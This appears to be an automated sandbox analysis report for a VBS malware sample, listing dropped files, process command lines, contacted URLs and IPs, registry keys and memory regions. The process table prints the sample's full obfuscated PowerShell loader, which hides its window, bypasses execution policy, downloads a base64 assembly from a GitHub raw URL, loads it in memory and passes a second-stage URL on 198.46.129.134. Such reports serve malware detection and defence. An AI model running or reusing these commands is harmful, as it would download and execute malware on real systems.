Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
uLfuBVyZFV.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s25lclyh.n15.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thwqgli0.33f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub5kjkxb.00x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtgdgi5j.edf.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI;
sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+');
sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+'
s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI,
'+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+'
hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://198.46.129.134
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
http://198.46.129.134/450/LDBRR.txt
|
198.46.129.134
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI;
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
raw.githubusercontent.com
|
185.199.108.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
198.46.129.134
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFB1A752000
|
unkown
|
page readonly
|
||
|
509ACFF000
|
stack
|
page read and write
|
||
|
7FFAAC602000
|
trusted library allocation
|
page read and write
|
||
|
FBE59FE000
|
stack
|
page read and write
|
||
|
177552E0000
|
heap
|
page read and write
|
||
|
1776F389000
|
heap
|
page read and write
|
||
|
7FFAAC7E3000
|
trusted library allocation
|
page read and write
|
||
|
177571A0000
|
heap
|
page execute and read and write
|
||
|
2AB0F9D0000
|
heap
|
page read and write
|
||
|
177553C0000
|
heap
|
page read and write
|
||
|
1C8229C6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
1C8328B1000
|
trusted library allocation
|
page read and write
|
||
|
94580FF000
|
stack
|
page read and write
|
||
|
7FFAAC7C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page execute and read and write
|
||
|
17758E9A000
|
trusted library allocation
|
page read and write
|
||
|
2AB0DD9B000
|
heap
|
page read and write
|
||
|
2AB0F9DE000
|
heap
|
page read and write
|
||
|
1C8229CA000
|
trusted library allocation
|
page read and write
|
||
|
1C822DA4000
|
trusted library allocation
|
page read and write
|
||
|
945853B000
|
stack
|
page read and write
|
||
|
2AB0FA86000
|
heap
|
page read and write
|
||
|
17756D40000
|
heap
|
page readonly
|
||
|
1776F4A3000
|
heap
|
page read and write
|
||
|
1776F460000
|
heap
|
page execute and read and write
|
||
|
7FFAAC424000
|
trusted library allocation
|
page read and write
|
||
|
1C820B40000
|
trusted library allocation
|
page read and write
|
||
|
94587BB000
|
stack
|
page read and write
|
||
|
2AB0F9DD000
|
heap
|
page read and write
|
||
|
7FFB1A750000
|
unkown
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0F9FA000
|
heap
|
page read and write
|
||
|
17758AF9000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5FA000
|
trusted library allocation
|
page read and write
|
||
|
1C820940000
|
heap
|
page read and write
|
||
|
2AB0F9D1000
|
heap
|
page read and write
|
||
|
1C83A9AC000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA99000
|
heap
|
page read and write
|
||
|
177681CD000
|
trusted library allocation
|
page read and write
|
||
|
17757702000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA2A000
|
heap
|
page read and write
|
||
|
2AB0FA99000
|
heap
|
page read and write
|
||
|
509AFFE000
|
stack
|
page read and write
|
||
|
17755400000
|
heap
|
page read and write
|
||
|
7FFAAC44D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0F9F6000
|
heap
|
page read and write
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA27000
|
heap
|
page read and write
|
||
|
945807E000
|
stack
|
page read and write
|
||
|
1C820AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
1C820A3D000
|
heap
|
page read and write
|
||
|
94581FE000
|
stack
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
177575A4000
|
trusted library allocation
|
page read and write
|
||
|
1C820AAB000
|
heap
|
page read and write
|
||
|
2AB0FA4A000
|
heap
|
page read and write
|
||
|
1C820A38000
|
heap
|
page read and write
|
||
|
7FFB1A730000
|
unkown
|
page readonly
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
509B1F9000
|
stack
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA13000
|
heap
|
page read and write
|
||
|
7FFAAC4DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0DC00000
|
heap
|
page read and write
|
||
|
1C8208E0000
|
heap
|
page read and write
|
||
|
945827E000
|
stack
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
94583BE000
|
stack
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
1776F323000
|
heap
|
page read and write
|
||
|
2AB0F9DA000
|
heap
|
page read and write
|
||
|
2AB0FB75000
|
heap
|
page read and write
|
||
|
2AB0F9E7000
|
heap
|
page read and write
|
||
|
7FFAAC5C2000
|
trusted library allocation
|
page read and write
|
||
|
FBE51FE000
|
stack
|
page read and write
|
||
|
17758DD5000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA63000
|
heap
|
page read and write
|
||
|
1C822D7A000
|
trusted library allocation
|
page read and write
|
||
|
1C8229B6000
|
trusted library allocation
|
page read and write
|
||
|
509B0F7000
|
stack
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA60000
|
heap
|
page read and write
|
||
|
2AB0FA68000
|
heap
|
page read and write
|
||
|
7FFB1A755000
|
unkown
|
page readonly
|
||
|
2AB0DD71000
|
heap
|
page read and write
|
||
|
7FFAAC506000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0FB75000
|
heap
|
page read and write
|
||
|
2AB0F9E2000
|
heap
|
page read and write
|
||
|
945863E000
|
stack
|
page read and write
|
||
|
94586BE000
|
stack
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
94582FF000
|
stack
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
177588D9000
|
trusted library allocation
|
page read and write
|
||
|
2AB0DCCC000
|
heap
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
1C83AAE0000
|
heap
|
page read and write
|
||
|
2AB0F9D4000
|
heap
|
page read and write
|
||
|
FBE55FF000
|
stack
|
page read and write
|
||
|
2AB0FA4C000
|
heap
|
page read and write
|
||
|
1776F9F0000
|
trusted library section
|
page read and write
|
||
|
2AB0FA3F000
|
heap
|
page read and write
|
||
|
1776F305000
|
heap
|
page read and write
|
||
|
2AB0FB57000
|
heap
|
page read and write
|
||
|
509B079000
|
stack
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0F9DF000
|
heap
|
page read and write
|
||
|
2AB0FA4F000
|
heap
|
page read and write
|
||
|
2AB0F680000
|
heap
|
page read and write
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
17757599000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FC54000
|
heap
|
page read and write
|
||
|
2AB0FB75000
|
heap
|
page read and write
|
||
|
177571B1000
|
trusted library allocation
|
page read and write
|
||
|
1C820986000
|
heap
|
page read and write
|
||
|
1C832923000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC622000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
509B2FE000
|
stack
|
page read and write
|
||
|
7FFAAC5D1000
|
trusted library allocation
|
page read and write
|
||
|
FBE57FD000
|
stack
|
page read and write
|
||
|
2AB0FA47000
|
heap
|
page read and write
|
||
|
1C820AC0000
|
heap
|
page readonly
|
||
|
2AB0FB5F000
|
heap
|
page read and write
|
||
|
17756D84000
|
heap
|
page read and write
|
||
|
1C820BC5000
|
heap
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
1C820A10000
|
heap
|
page read and write
|
||
|
1775549D000
|
heap
|
page read and write
|
||
|
2AB0DCA0000
|
heap
|
page read and write
|
||
|
1C820A9A000
|
heap
|
page read and write
|
||
|
1C822A0A000
|
trusted library allocation
|
page read and write
|
||
|
1776F609000
|
heap
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
509AC73000
|
stack
|
page read and write
|
||
|
2AB0F9FD000
|
heap
|
page read and write
|
||
|
2AB0FA80000
|
heap
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C822EBE000
|
trusted library allocation
|
page read and write
|
||
|
7DF435E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0FA6F000
|
heap
|
page read and write
|
||
|
177570D0000
|
trusted library allocation
|
page read and write
|
||
|
509ADFE000
|
stack
|
page read and write
|
||
|
7FFAAC444000
|
trusted library allocation
|
page read and write
|
||
|
1C83A8F9000
|
heap
|
page read and write
|
||
|
177576CC000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4F6000
|
trusted library allocation
|
page read and write
|
||
|
945873F000
|
stack
|
page read and write
|
||
|
FBE52FE000
|
stack
|
page read and write
|
||
|
2AB0FA99000
|
heap
|
page read and write
|
||
|
2AB0FA81000
|
heap
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
FBE58FE000
|
stack
|
page read and write
|
||
|
177588B4000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
509AF7E000
|
stack
|
page read and write
|
||
|
1C820800000
|
heap
|
page read and write
|
||
|
1C820AA5000
|
heap
|
page read and write
|
||
|
7FFB1A750000
|
unkown
|
page read and write
|
||
|
177575DE000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA98000
|
heap
|
page read and write
|
||
|
94585BF000
|
stack
|
page read and write
|
||
|
1C822913000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0F9D8000
|
heap
|
page read and write
|
||
|
2AB0FB3E000
|
heap
|
page read and write
|
||
|
7FFAAC443000
|
trusted library allocation
|
page execute and read and write
|
||
|
177575B2000
|
trusted library allocation
|
page read and write
|
||
|
2AB0DAE0000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page execute and read and write
|
||
|
17756CE0000
|
heap
|
page read and write
|
||
|
2AB0FB75000
|
heap
|
page read and write
|
||
|
1776F5C0000
|
heap
|
page read and write
|
||
|
7FFB1A750000
|
unkown
|
page read and write
|
||
|
1C820900000
|
heap
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
94584B9000
|
stack
|
page read and write
|
||
|
1C83A8F7000
|
heap
|
page read and write
|
||
|
177553F0000
|
heap
|
page read and write
|
||
|
2AB0FA33000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
2AB0F9FD000
|
heap
|
page read and write
|
||
|
509A9DE000
|
stack
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page read and write
|
||
|
2AB0F9F1000
|
heap
|
page read and write
|
||
|
2AB0DCDE000
|
heap
|
page read and write
|
||
|
2AB0FA54000
|
heap
|
page read and write
|
||
|
1C8328BF000
|
trusted library allocation
|
page read and write
|
||
|
177554C3000
|
heap
|
page read and write
|
||
|
7FFB1A755000
|
unkown
|
page readonly
|
||
|
7FFAAC423000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C83AA00000
|
heap
|
page read and write
|
||
|
2AB0DD7F000
|
heap
|
page read and write
|
||
|
177575DA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC42D000
|
trusted library allocation
|
page execute and read and write
|
||
|
17758E9F000
|
trusted library allocation
|
page read and write
|
||
|
1C820980000
|
heap
|
page read and write
|
||
|
2AB0DBE0000
|
heap
|
page read and write
|
||
|
2AB0F9D8000
|
heap
|
page read and write
|
||
|
177671B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC442000
|
trusted library allocation
|
page read and write
|
||
|
1C83A999000
|
heap
|
page read and write
|
||
|
1C822A0F000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
509AEFE000
|
stack
|
page read and write
|
||
|
1C8229BA000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FB4A000
|
heap
|
page read and write
|
||
|
2AB0FB49000
|
heap
|
page read and write
|
||
|
9458377000
|
stack
|
page read and write
|
||
|
2AB0FA7B000
|
heap
|
page read and write
|
||
|
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
177573D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
1C820990000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
|
9457CC3000
|
stack
|
page read and write
|
||
|
2AB0FB56000
|
heap
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7EB000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FB75000
|
heap
|
page read and write
|
||
|
2AB0DBC0000
|
heap
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FAD1000
|
heap
|
page read and write
|
||
|
2AB0DD87000
|
heap
|
page read and write
|
||
|
1775722F000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
2AB0DD87000
|
heap
|
page read and write
|
||
|
1775547F000
|
heap
|
page read and write
|
||
|
2AB0DD7F000
|
heap
|
page read and write
|
||
|
2AB0FB4B000
|
heap
|
page read and write
|
||
|
177575B6000
|
trusted library allocation
|
page read and write
|
||
|
1775782C000
|
trusted library allocation
|
page read and write
|
||
|
2AB0F9D9000
|
heap
|
page read and write
|
||
|
2AB0FA1A000
|
heap
|
page read and write
|
||
|
1C83A8B0000
|
heap
|
page read and write
|
||
|
2AB0DCCB000
|
heap
|
page read and write
|
||
|
2AB0FA58000
|
heap
|
page read and write
|
||
|
2AB0DD87000
|
heap
|
page read and write
|
||
|
FBE5AFB000
|
stack
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
2AB0F9D5000
|
heap
|
page read and write
|
||
|
7FFAAC45B000
|
trusted library allocation
|
page read and write
|
||
|
1C8228EB000
|
trusted library allocation
|
page read and write
|
||
|
1C822856000
|
heap
|
page execute and read and write
|
||
|
177671C0000
|
trusted library allocation
|
page read and write
|
||
|
FBE54FE000
|
stack
|
page read and write
|
||
|
177578C9000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA99000
|
heap
|
page read and write
|
||
|
2AB0FB86000
|
heap
|
page read and write
|
||
|
1776F5D2000
|
heap
|
page read and write
|
||
|
9458437000
|
stack
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FBD0000
|
heap
|
page read and write
|
||
|
1C83AE80000
|
heap
|
page read and write
|
||
|
2AB0DD7F000
|
heap
|
page read and write
|
||
|
1776F613000
|
heap
|
page read and write
|
||
|
1C822850000
|
heap
|
page execute and read and write
|
||
|
1776F3BA000
|
heap
|
page read and write
|
||
|
2AB0DD9C000
|
heap
|
page read and write
|
||
|
17756D86000
|
heap
|
page read and write
|
||
|
177674AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F1000
|
trusted library allocation
|
page read and write
|
||
|
2AB0F9E9000
|
heap
|
page read and write
|
||
|
2AB0FA09000
|
heap
|
page read and write
|
||
|
2AB0FAD0000
|
heap
|
page read and write
|
||
|
2AB0FA99000
|
heap
|
page read and write
|
||
|
2AB0DD87000
|
heap
|
page read and write
|
||
|
509B27E000
|
stack
|
page read and write
|
||
|
17758890000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA97000
|
heap
|
page read and write
|
||
|
17756D80000
|
heap
|
page read and write
|
||
|
2AB0DCCF000
|
heap
|
page read and write
|
||
|
2AB0DCCE000
|
heap
|
page read and write
|
||
|
177677CD000
|
trusted library allocation
|
page read and write
|
||
|
17757100000
|
trusted library allocation
|
page read and write
|
||
|
2AB0DD2F000
|
heap
|
page read and write
|
||
|
1C83A98F000
|
heap
|
page read and write
|
||
|
1C83A938000
|
heap
|
page read and write
|
||
|
509B3FE000
|
stack
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
1C8209F6000
|
heap
|
page read and write
|
||
|
2AB0FA36000
|
heap
|
page read and write
|
||
|
17756D30000
|
trusted library allocation
|
page read and write
|
||
|
2AB0DD7F000
|
heap
|
page read and write
|
||
|
1C8228A0000
|
heap
|
page read and write
|
||
|
17756D10000
|
trusted library allocation
|
page read and write
|
||
|
1C822C6F000
|
trusted library allocation
|
page read and write
|
||
|
509B47B000
|
stack
|
page read and write
|
||
|
1776F8A0000
|
heap
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
509BECD000
|
stack
|
page read and write
|
||
|
1C8209B0000
|
heap
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC5DA000
|
trusted library allocation
|
page read and write
|
||
|
509B178000
|
stack
|
page read and write
|
||
|
2AB0FB37000
|
heap
|
page read and write
|
||
|
1C8209F0000
|
heap
|
page read and write
|
||
|
2AB0F9D3000
|
heap
|
page read and write
|
||
|
1C8209FA000
|
heap
|
page read and write
|
||
|
7FFB1A731000
|
unkown
|
page execute read
|
||
|
1C822BF0000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA02000
|
heap
|
page read and write
|
||
|
2AB0F9DC000
|
heap
|
page read and write
|
||
|
7FFAAC422000
|
trusted library allocation
|
page read and write
|
||
|
1C820BC0000
|
heap
|
page read and write
|
||
|
509AE7D000
|
stack
|
page read and write
|
||
|
509BE4E000
|
stack
|
page read and write
|
||
|
2AB0F9D2000
|
heap
|
page read and write
|
||
|
7FFB1A730000
|
unkown
|
page readonly
|
||
|
1C822940000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FB42000
|
heap
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
1C83A99D000
|
heap
|
page read and write
|
||
|
177577C0000
|
trusted library allocation
|
page read and write
|
||
|
1C8209FC000
|
heap
|
page read and write
|
||
|
1775888B000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FA5B000
|
heap
|
page read and write
|
||
|
7FFAAC49C000
|
trusted library allocation
|
page execute and read and write
|
||
|
945817D000
|
stack
|
page read and write
|
||
|
2AB0FB42000
|
heap
|
page read and write
|
||
|
2AB0DCCF000
|
heap
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
2AB0FB48000
|
heap
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
1776F466000
|
heap
|
page execute and read and write
|
||
|
1C820B60000
|
heap
|
page execute and read and write
|
||
|
7FFB1A752000
|
unkown
|
page readonly
|
||
|
1776F590000
|
heap
|
page execute and read and write
|
||
|
2AB0FA4F000
|
heap
|
page read and write
|
||
|
1776F660000
|
heap
|
page read and write
|
||
|
1775547B000
|
heap
|
page read and write
|
||
|
1C8228B1000
|
trusted library allocation
|
page read and write
|
||
|
1C822DE7000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
|
9457D4E000
|
stack
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
1C8228CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC526000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AB0FB60000
|
heap
|
page read and write
|
||
|
